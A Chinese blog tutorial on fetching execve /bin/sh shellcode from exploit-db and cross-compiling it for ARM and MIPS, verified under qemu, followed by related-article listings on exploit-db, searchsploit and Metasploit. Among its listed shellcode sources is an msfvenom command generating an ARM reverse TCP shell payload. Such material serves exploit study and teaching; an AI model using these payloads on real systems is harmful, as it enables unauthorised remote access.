利用 exploit-db 交叉编译 shellcode

最新推荐文章于 2024-12-15 09:50:09 发布
最新推荐文章于 2024-12-15 09:50:09 发布
阅读量676 收藏
点赞数 1
分类专栏: 软件逆向 文章标签: c语言 c++ bash
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/YouTheFreedom/article/details/120409098
版权

文章目录

shellcode 通用编写方法

获得shellcode一般有如下五种办法:

  1. pwntools: asm(shellcraft.arm.linux.sh(),arch=’arm’)
  2. msfvenom: msfvenom -p linux/armle/shell/reverse_tcp LHOST=192.168.1.100 LPORT=6666 -f py -o msf.py
  3. shell-storm: http://shell-storm.org/shellcode/
  4. exploit-db: https://www.exploit-db.com/shellcodes
  5. 自己编译:StarCTF 2021 RISC-V Pwn Favourite Architecture: shellcode 编写练习

本次简单介绍下如何通过 www.exploit-db.com 获得 shellcode 源码,然后再交叉编译成不同平台的可执行文件的过程,可执行文件的功能是可以通过 /bin/sh 执行 shell 命令。

编写 ARM shellcode

进入网站后选择左侧菜单栏的 SHELLCODE,然后在右上角搜索 ARM 版的 shellcode。

在这里插入图片描述

拷贝代码到新建文件中,重命名为 execve_arm.c,选择合适版本的交叉编译链,静态编译源码为目标架构的可执行程序。

静态编译

armv6l-gcc -o execve_arm execve.c --static

查看程序架构信息

readelf -h execve_arm

ELF 头:
  Magic:   7f 45 4c 46 01 01 01 00 00 00 00 00 00 00 00 00 
  类别:                              ELF32
  数据:                              2 补码,小端序 (little endian)
  版本:                              1 (current)
  OS/ABI:                            UNIX - System V
  ABI 版本:                          0
  类型:                              EXEC (可执行文件)
  系统架构:                          ARM
  版本:                              0x1
  入口点地址:               0x816c
  程序头起点:          52 (bytes into file)
  Start of section headers:          67052 (bytes into file)
  标志:             0x4000002, Version4 EABI, <unknown>
  本头的大小:       52 (字节)
  程序头大小:       32 (字节)
  Number of program headers:         4
  节头大小:         40 (字节)
  节头数量:         27
  字符串表索引节头: 24

qemu 本地运行验证是否可用

qemu-arm-static execve_arm

ubuntu@ubuntu-virtual-machine:~/compile$ qemu-arm-static execve_arm 
Shellcode Length:  32
$ ls -al
total 110168
drwxrwxr-x  8 ubuntu ubuntu      4096 Aug  3 11:09 .
drwxr-xr-x 68 ubuntu ubuntu      4096 Aug  3 09:29 ..
drwxr-xr-x 10 ubuntu ubuntu      4096 Apr  5  2009 armv4l
drwxr-xr-x 10 ubuntu ubuntu      4096 Apr  5  2009 armv5l
drwxr-xr-x 12 ubuntu ubuntu      4096 Mar 16  2017 armv6l
-rw-rw-r--  1 ubuntu ubuntu       345 Jul 30 14:07 execve.c
-rwxrwxr-x  1 ubuntu ubuntu     80062 Jul 30 14:08 execve_arm
-rwxrwxr-x  1 ubuntu ubuntu   4049876 Jul 30 14:27 execve_arm7
-rwxrwxr-x  1 ubuntu ubuntu     38067 Jul 30 15:06 execve_mips
-rw-rw-r--  1 ubuntu ubuntu       805 Jul 30 15:06 execve_mips.c
-rwxrwxr-x  1 ubuntu ubuntu     38035 Jul 30 14:58 execve_mipsel
-rw-rw-r--  1 ubuntu ubuntu       486 Jul 30 14:58 execve_mipsel.c
drwxr-xr-x  8 ubuntu ubuntu      4096 Nov 19  2017 gcc-linaro-7.2.1-2017.11-x86_64_arm-linux-gnueabihf
-rw-r--r--  1 ubuntu ubuntu 108376348 Jul 30 14:19 gcc-linaro-7.2.1-2017.11-x86_64_arm-linux-gnueabihf.tar.tar
drwxr-xr-x 11 ubuntu ubuntu      4096 Oct 29  2020 mips
drwxr-xr-x 10 ubuntu ubuntu      4096 Apr  5  2009 mipsel
-rwxrwxr-x  1 ubuntu ubuntu     38172 Jul 30 10:18 shellcode
-rw-rw-r--  1 ubuntu ubuntu       593 Jul 30 10:34 shellcode.c
-rwxrwxr-x  1 ubuntu ubuntu     80137 Jul 30 10:35 shellcode_arm
-rwxrwxr-x  1 ubuntu ubuntu     38172 Jul 30 10:18 shellcode_mipsel
$

验证成功,可以继续编译 mips 的版本了。

编写 MIPS shellcode

同样的步骤,在右上角搜索栏搜索 mips,根据实际需要选择大端或小端,我这里选择的是大端。

在这里插入图片描述

复制源码到新建文件中,重命名为 execve_mips.c,选择合适版本的交叉编译链,静态编译源码为目标架构的可执行程序。

静态编译

mips-gcc -o execve_mips execve_mips.c --static

查看程序架构信息

ELF 头:
  Magic:   7f 45 4c 46 01 02 01 00 00 00 00 00 00 00 00 00 
  类别:                              ELF32
  数据:                              2 补码,大端序 (big endian)
  版本:                              1 (current)
  OS/ABI:                            UNIX - System V
  ABI 版本:                          0
  类型:                              EXEC (可执行文件)
  系统架构:                          MIPS R3000
  版本:                              0x1
  入口点地址:               0x4002a0
  程序头起点:          52 (bytes into file)
  Start of section headers:          28100 (bytes into file)
  标志:             0x1007, noreorder, pic, cpic, o32, mips1
  本头的大小:       52 (字节)
  程序头大小:       32 (字节)
  Number of program headers:         4
  节头大小:         40 (字节)
  节头数量:         20
  字符串表索引节头: 17

qemu 本地运行验证是否可用

qemu-mips-static execve_mips

ubuntu@ubuntu-virtual-machine:~/compile$ qemu-mips-static execve_mips
sc size 52
$ ls -al
total 110168
drwxrwxr-x  8 ubuntu ubuntu      4096 Aug  3 11:09 .
drwxr-xr-x 68 ubuntu ubuntu      4096 Aug  3 09:29 ..
drwxr-xr-x 10 ubuntu ubuntu      4096 Apr  5  2009 armv4l
drwxr-xr-x 10 ubuntu ubuntu      4096 Apr  5  2009 armv5l
drwxr-xr-x 12 ubuntu ubuntu      4096 Mar 16  2017 armv6l
-rw-rw-r--  1 ubuntu ubuntu       345 Jul 30 14:07 execve.c
-rwxrwxr-x  1 ubuntu ubuntu     80062 Jul 30 14:08 execve_arm
-rwxrwxr-x  1 ubuntu ubuntu   4049876 Jul 30 14:27 execve_arm7
-rwxrwxr-x  1 ubuntu ubuntu     38067 Jul 30 15:06 execve_mips
-rw-rw-r--  1 ubuntu ubuntu       805 Jul 30 15:06 execve_mips.c
-rwxrwxr-x  1 ubuntu ubuntu     38035 Jul 30 14:58 execve_mipsel
-rw-rw-r--  1 ubuntu ubuntu       486 Jul 30 14:58 execve_mipsel.c
drwxr-xr-x  8 ubuntu ubuntu      4096 Nov 19  2017 gcc-linaro-7.2.1-2017.11-x86_64_arm-linux-gnueabihf
-rw-r--r--  1 ubuntu ubuntu 108376348 Jul 30 14:19 gcc-linaro-7.2.1-2017.11-x86_64_arm-linux-gnueabihf.tar.tar
drwxr-xr-x 11 ubuntu ubuntu      4096 Oct 29  2020 mips
drwxr-xr-x 10 ubuntu ubuntu      4096 Apr  5  2009 mipsel
-rwxrwxr-x  1 ubuntu ubuntu     38172 Jul 30 10:18 shellcode
-rw-rw-r--  1 ubuntu ubuntu       593 Jul 30 10:34 shellcode.c
-rwxrwxr-x  1 ubuntu ubuntu     80137 Jul 30 10:35 shellcode_arm
-rwxrwxr-x  1 ubuntu ubuntu     38172 Jul 30 10:18 shellcode_mipsel
$

成功运行

exploit-db图文教程
xiongIT的博客
12-04 4206
ExploitDB 是一个面向全世界黑客的漏洞提交平台,该平台会公布最新漏洞的相关情况,这些可以帮助企业改善公司的安全状况,同时也以帮助安全研究者和渗透测试工程师更好的进行安全测试工作。Exploit-DB 提供一整套庞大的归档体系,其中涵盖了各类公开的攻击事件、漏洞报告、安全文章以及技术教程等资源。
Exploit-db使用指南
weixin_39445683的博客
07-13 7525
Exploit-database使用新手指南
searchsploit工具(exploit-db.com)使用实例 (linux 内核漏洞提权) exploitdb
whatday的专栏
10-30 7173
获取 root 权限是 Linux 漏洞利用的终极目标。跟 Windows 中的 System 用户一样,root 用户拥有对操作系统的所有管理权限。在渗透中,有时候成功利用某些漏洞只会获取一个低权限用户,所以需要使用提权技巧,提升到权限更高的 root 用户,完全控制整个系统。 一般来说,获取到低权限 shell 后我们通常会做下面几件事: 1. 检测操作系统的发行版本 2. 查看内核版本 3...
Exploit-DB 使用小结
未完成的歌~的博客
09-23 6266
是一个漏洞库网站 ,存储了大量的漏洞利用程序,可以帮助安全研究者和渗透测试工程师更好的进行安全测试工作,目前是世界上公开收集漏洞最全的数据库,该仓库每天都会更新。searchsploit 是一个用于搜索 Exploit-DB 漏洞数据的命令行工具(Kali默认已安装),可以离线搜索 Exploit 数据库,这对于有时候不能联网的渗透工作非常的有用。
Exploit-DB与相关本地工具的综合运用
Kali与编程
04-10 764
例如,在进行web应用渗透时,可能先用Nmap扫描目标网络服务,再结合Burp Suite抓包分析请求响应,找出潜在漏洞点,最后在Exploit-DB中寻找适用的exploit并实施攻击。Exploit-DB作为丰富的漏洞利用资源库,与本地安全工具的紧密结合能够极大提高安全研究和渗透测试的工作效率。以Metasploit Framework为例,这是一个集成开发环境,集成了众多Exploit-DB中的exploit,并提供了图形化和命令行界面,方便用户执行和管理渗透测试任务。二、Exploit-DB简介。
CVE-2017-11882漏洞分析与利用
qq_36949907的博客
07-10 1804
(一次大作业,比较啰嗦 见谅) 漏洞介绍 2017年11月14号,微软推送了常规的安全更新,其中就包括CVE-2017-11882的安全更新,当时还引起了不小的关注,之后Github上也公布了许多POC及对应的漏洞利用程序。 仅仅从CVE-2017-11882的漏洞利用效果来看,它可以通杀Office 2003到Office 2016的所有版本,并且整个攻击环境的构建非常简单,效果又非常的好。例如,有些攻击效果会出现弹框、CPU飙高、发生异常等等,而这个漏洞的利用效果,堪称“无色无味”,即整个过程几.
渗透测试 ( 3 ) --- Metasploit Framework ( MSF )
墨鱼菜鸡
07-11 4817
白嫖 Metasploit Pro 2022:https://zhuanlan.zhihu.com/p/449836479 白嫖 Metasploit Pro 2022:http://t.zoukankan.com/hxlinux-p-15787814.html 好东西之 metasploit pro:https://www.52pojie.cn/thr...
SMBGhost漏洞(CVE2020-0796)简单分析
bluebloodye的专栏
06-26 2696
0x00 漏洞描述 3 月 10 日:微软发布安全通告 ADV200005,称 SMBv3 协议在处理某些请求的方式中存在代码执行漏洞,并提供了缓解措施。 3 月 12 日:微软正式发布 CVE-2020-0796 安全通告和漏洞修复补丁。 CVE-2020-0796是Windows 10 1903/1909的新SMB3压缩功能中的错误。 SMB协议版本3.1.1引入了一种功能,即客户端或服务器可以发布压缩功能,并有选择地压缩SMB3消息。 使用此功能协商会话后,客户端或服务器可以选择..
MSF的使用教程
热门推荐
hackzkaq的博客
10-18 3万+
公众号:白帽子左一 MSF简介 Metasploit(MSF)是一个免费的、可下载的框架 它本身附带数百个已知软件漏洞,是一款专业级漏洞攻击工具。 当H.D. Moore在2003年发布Metasploit时,计算机安全状况也被永久性地改变了,仿佛一夜之间,任何人都可以成为黑客。 因为只要掌握MSF的使用方法,每个人都可以使用MSF来攻击那些未打过补丁或者刚刚打过补丁的漏洞。 也因此软件厂商再也不能推迟发布针对已公布漏洞的补丁了,因为Metasploit团队一直都在努力开发各种攻击工具,并将它们贡献给所.
模糊测试--强制性安全漏洞发掘
软件性能测试专栏
01-20 2万+
文档分享地址链接:http://pan.baidu.com/share/link?shareid=2723797392&uk=2485812037 密码:r43x 前 言 我知道"人类和鱼类能够和平共处" 。 --George W. Bush, 2000年9月29日 简介 模糊测试的概念至少已经流传了20年,但是直到最近才引起广泛的关注。安全漏洞困扰了许多流行的客户端应用程序
exploit-database, 官方利用数据库库.zip
10-12
exploit-database, 官方利用数据库库 利用数据库Git库这是一个的官方知识库,利用Exploit数据库,一个由攻击赞助的项目( ) 。 我们的仓库是:利用 & Shellcodes: https://github.com/offensive-security/ex
exploitdb-json-api:用于 ExploitDB 网站的 JSON API
07-01
利用db-json-api 用于 ExploitDB 网站的 JSON API 要求 安装和 MySQL 数据库。 如何安装? 克隆我的仓库和子模块()。 这样做: git clone --recursive https://github.com/PaulSec/exploitdb-json-api.git cd exploitdb-json-api 然后,使用 sql 文件创建数据库和漏洞利用表: mysql -uroot < create.sql 移动或复制 files.csv(来自 /tmp/ 中的 Exploitdb 项目)并更改文件的权限 mv exploitdb/files.csv /tmp/files.csv chown mysql:mysql /tmp/files.csv 导入数据库中的数据: LOAD DATA INFILE " /tmp/files.cs
exploitdb:官方漏洞利用数据库存储库
02-20
漏洞利用数据库Git存储库 这是一个官方的仓库,一个主办。 我们的存储库是: 漏洞和Shellcodes: : 二进制漏洞利用: : 论文: : 漏洞利用数据库是公共漏洞利用和相应的易受攻击软件的存档,专为渗透测试人员和漏洞研究人员使用而开发。 它的目的是作为通过直接提交,邮件列表和其他公共资源收集的, 和的最全面集合,并将它们呈现在可免费使用且易于导航的数据库中。 漏洞利用数据库是漏洞利用和概念验证(而非咨询)的存储库,对于那些立即需要可操作数据的人来说,它是宝贵的资源。 您可以在和了解有关该项目的更多信息。 该存储库每天都会使用最新添加的提交进行更新。 任何其他资源都可以在我们的。 漏洞位于目录中,shellcode位于目录中。 执照 该项目(和SearchSploit)在“ ”下发布。 SearchSploit 该存储库中包含SearchSploit实用程序,使
The Exploit Database
a815064247的博客
01-17 2324
https://www.exploit-db.com/
开源项目Exploit-DB使用指南
gitblog_00369的博客
12-15 973
开源项目Exploit-DB使用指南 exploitdb The legacy Exploit Database repository - New repo located at https://gitlab.com/exploit-database/exploitdb ...
(转载)Exploitshellcode经验技巧杂谈
Kendiv's Box
11-12 2704
Exploitshellcode经验技巧杂谈转自:http://www.xfocus.net创建时间:2003-07-14文章属性:原创文章提交:OYXin (oyxin_at_ph4nt0m.net)OYXinOYXin@ph4nt0m.net                          Exploitshellcode经验技巧谈    这篇文章不是教你如何去写exploit,shel
SearchSploit漏洞查找工具使用指南
大方子
10-04 7911
什么是SearchSploit: “searchsploit”是一个用于Exploit-DB的命令行搜索工具,它还允许你随身带一份Exploit-DB的副本。 SearchSploit为您提供了在本地保存的存储库中执行详细的离线搜索的能力。这种能力特别适用于在没有互联网接入的情况下对网络进行安全评估。许多漏洞都包含了二进制文件的链接,这些文件不包含在标准存储库中,但可以在我们的Exploit-...
Exploit-db与Searchsploit的应用与编程
2301_79330511的博客
08-16 420
本文介绍了Exploit-db和Searchsploit的基本概念,并提供了使用Python编程进行漏洞搜索和漏洞利用模块下载的示例代码。不过,在使用Exploit-db和Searchsploit时,务必遵守法律法规,合法使用这些工具,以确保网络安全和个人隐私的保护。Searchsploit本地保存了Exploit-db的漏洞利用模块,当漏洞数据库更新时,我们需要及时更新本地数据库。使用Exploit-db和Searchsploit,我们还可以下载特定的漏洞利用模块进行分析或攻击测试。来下载漏洞利用模块。
【翻译】exploit-db-HOME-About The Exploit Database
weixin_30600503的博客
10-21 423
感觉需要用日记鞭策一下自己,回顾自己的每天有没有浪费。 上午基本是玩了,只看了下英文网站,记录一下,顺便积累点单词。翻译中遇到的问题整理在最后,希望各位帮忙指正,多谢! 来源:【exploit-db】 About The Exploit Database Who we are, what we do and more[1]. 我们是谁,我们做什么 t...
Exploit-db
最新发布
01-19
### Exploit-DB 安全漏洞数据库资源介绍 #### Exploit-DB 的概述 Exploit-DB 是由 Offensive Security 维护的一个公开的安全漏洞数据库,其中包含了大量针对不同系统和服务的已知安全漏洞利用代码。这个平台不仅是一个面向全球黑客的漏洞提交站点,还提供了一整套庞大的归档体系,涵盖了各类公开的攻击事件、漏洞报告、安全文章和技术教程等资源[^1]。 #### 在线查找漏洞代码的方法 访问官方网站 [https://www.exploit-db.com](https://www.exploit-db.com/) 可以直接通过搜索引擎功能来查询所需的漏洞信息。用户可以根据特定条件筛选并获取最新的漏洞详情及其对应的利用脚本或方法说明[^2]。 #### 离线查找漏洞代码的方式 为了方便离线操作,可以使用 `searchsploit` 这款命令行工具来进行本地数据检索。首先需要定期执行更新指令保持数据库同步至最新状态: ```bash sudo searchsploit -u ``` 之后便可以通过简单的关键词匹配快速定位到感兴趣的条目,并查看其具体内容或者下载相应的文件用于进一步的研究和测试目的。 #### Exploit-DB 对于安全领域的重要性 作为当前世界上最为全面开放式的漏洞集合之一,Exploit-DB 不仅能够帮助企业及时发现潜在风险从而采取预防措施加强防护能力;同时也为从事信息安全工作的专业人士提供了宝贵的学习资料和支持手段,在提升技术水平方面发挥着不可替代的作用[^3]。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值